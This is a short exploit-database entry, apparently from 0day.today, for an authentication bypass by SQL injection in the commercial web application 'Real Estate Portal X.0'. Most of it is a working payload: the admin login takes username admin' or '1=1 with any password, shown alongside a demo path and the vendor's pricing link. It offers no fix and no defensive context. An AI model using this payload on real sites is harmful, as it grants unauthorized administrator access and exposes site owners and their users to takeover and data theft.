id: 10123
date: 12/09/2009
title: Real Estate Portal X.0 (Auth Bypass) Remote Sql Injection
author: AnTi SeCuRe
cves: 

=========================================================
Real Estate Portal X.0 (Auth Bypass) Remote Sql Injection
=========================================================

###############################
 
~ Note :Its Not Free .. Its By : $199.00
~ IF You Want To Buy It : http://www.netartmedia.net/en_Pricing.html
 
[~] Demo : http://www.site.com/realestate20/
[~] username: admin' or '1=1
[~] password: Anti
 


#  0day.today [2023-03-24]  #